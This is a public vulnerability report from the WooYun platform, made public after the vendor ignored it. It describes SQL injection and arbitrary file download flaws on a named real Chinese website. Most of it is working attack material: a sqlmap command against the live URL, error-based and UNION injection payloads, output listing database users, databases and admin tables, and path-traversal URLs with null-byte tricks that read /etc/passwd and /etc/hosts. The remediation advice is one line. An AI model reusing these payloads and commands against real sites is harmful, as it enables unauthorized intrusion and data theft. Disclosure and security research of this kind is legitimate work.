当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-059696

漏洞标题:中车联盟网站存在sql注入+任意文件下载漏洞

相关厂商:中车联盟

漏洞作者: piza_M

提交时间:2014-05-06 19:16

修复时间:2014-06-20 19:16

公开时间:2014-06-20 19:16

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-06: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-06-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

中车联盟网站存在sql注入+任意文件下载漏洞

详细说明:

问题1,sql注入
注入参数searchword

[root@Hacker~]# Sqlmap -u "http://www.aachina.net/search.php?search=search&searchword=4Cub3IhuFH6"
---
Place: GET
Parameter: searchword
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: search=search&searchword=4Cub3IhuFH6' AND (SELECT 7835 FROM(SELECT
COUNT(*),CONCAT(0x3a6d666a3a,(SELECT (CASE WHEN (7835=7835) THEN 1 ELSE 0 END)),
0x3a6b6d6f3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY
x)a) AND 'ugoP'='ugoP
    Type: UNION query
    Title: MySQL UNION query (NULL) - 12 columns
    Payload: search=search&searchword=4Cub3IhuFH6' LIMIT 1,1 UNION ALL SELECT NU
LL, CONCAT(0x3a6d666a3a,0x4f62526d7a6e696a6146,0x3a6b6d6f3a), NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL#
---
[17:43:49] [INFO] testing MySQL
[17:43:49] [WARNING] reflective value(s) found and filtering out
[17:43:49] [INFO] confirming MySQL
[17:43:50] [INFO] the back-end DBMS is MySQL
[17:43:50] [INFO] fetching banner
[17:43:51] [INFO] actively fingerprinting MySQL
[17:43:51] [INFO] heuristics detected web page charset 'utf-8'
[17:43:52] [INFO] executing MySQL comment injection fingerprint
web server operating system: Linux CentOS
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0
banner:    '5.1.69'
[17:44:27] [INFO] fetching database users
database management system users [1]:
[*] 'aachina'@'localhost'
[17:44:28] [INFO] fetching database names
available databases [3]:
[*] db_aachina
[*] information_schema
[*] test
[17:55:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5
[17:55:12] [INFO] fetching database names
[17:55:12] [INFO] fetching tables for databases: 'db_aachin
, test'
[17:55:13] [WARNING] reflective value(s) found and filterin
Database: db_aachina
[24 tables]
+---------------------------------------+
| gwi_admin                             |
| gwi_adminlog                          |
| gwi_channel                           |
| gwi_comment                           |
| gwi_failedlogin                       |
| gwi_file                              |
| gwi_file_class                        |
| gwi_form                              |
| gwi_formdata                          |
| gwi_gbook                             |
| gwi_group                             |
| gwi_info                              |
| gwi_info_class                        |
| gwi_info_content                      |
| gwi_keyword                           |
| gwi_link                              |
| gwi_member                            |
| gwi_photo                             |
| gwi_photo_class                       |
| gwi_rel_comkey                        |
| gwi_rel_key                           |
| gwi_settings                          |
| gwi_styles                            |
| gwi_templates                         |
+---------------------------------------+


问题2,任意文件下载
http://www.aachina.net/user.php?action=../../../../../../../../../../etc/passwd%00.jpg
http://www.aachina.net/user.php?action=../../../../../../../../../../etc/hosts%00.jpg

1.jpg

漏洞证明:

已经证明

修复方案:

过滤参数

版权声明:转载请注明来源 piza_M@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝